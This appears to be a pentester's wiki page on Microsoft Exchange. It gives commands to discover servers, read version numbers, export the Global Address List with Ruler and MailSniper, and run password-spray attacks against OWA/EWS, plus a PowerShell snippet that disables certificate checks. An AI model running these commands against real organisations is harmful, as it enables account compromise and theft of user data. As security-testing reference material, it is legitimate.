Exchange services

Theory

Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems.

Practice

Enumeration

Discover Exchange Servers

We can use following commands to discover Exchange servers from a large scope of subdomains:

$ cat subdomains.txt
sub1.example.com
sub2.example.ru
sub3.example.bz

$ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr
1.3.3.7 [mx1.example.com]
66.66.66.66 [mx2.example.ru]
123.123.123.123 [mx3.example.bz]

Enumerate Exchange Version

We can use following commands to retreive the Exchange build number and correlate it with the release dates:

curl -sSL https://<TARGET>/owa/auth/logon.aspx -k| grep favicon.ico
# OR
curl https://<TARGET>/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format - | grep version

We can use following commands to retreive the Exchange build number and correlate it with the release dates:

add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
        }
    }
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy

(curl -UseBasicParsing -MaximumRedirection 0 https://exch01).Headers."X-OWA-Version"

User Enumeration (GAL)

If access to a domain-joined computer or a corporate email account is obtained, the Global Address List (GAL) can be exported, allowing a list of usernames to be retreived.

Ruler

Ruler (Go) can be used to retreive the GAL using known credentials.

ruler -k -d target.domain -u user -p 'Passw0rd!' -e [email protected] --verbose abk dump -o gal.txt

global-address-list-owa

global-address-list-owa (Python) can also be used to export the Gal using known credentials.

python3 emailextract.py -i exch01.target.domain -u [email protected] -p 'P@ssword!'

MailSniper (Powershell) can be used to retreive the GAL from a domain-joined computer.

Get-GlobalAddressList -ExchHostname mx.target.com -UserName TARGET\user -Password 'Passw0rd!' -OutFile gal.txt

Vulnerabilities

PrivExchange ProxyLogon ProxyShell ProxyNotShell

Password Spray

Password spray is an attack that involves using a single password against multiple accounts. This avoids account lockouts when multiple passwords are used on a single account. More details on this page.

Ruler (Go) can be used to perform password spray attacks

ruler -k --domain target.domain brute --users global_address_list.txt --passwords passwords.txt --verbose -a 4

Using MailSniper, we can perform a password spray with the functions Invoke-PasswordSprayOWA or Invoke-PasswordSprayEWS.

Invoke-PasswordSprayOWA -ExchHostname exch01.domain.local -UserList .\usernames.txt -Password "P@ssword!" -OutFile creds.txt

Resources

Exchange | Pentester's Promiscuous Notebookppn.snovvcra.sh

Last updated 4 months ago

Was this helpful?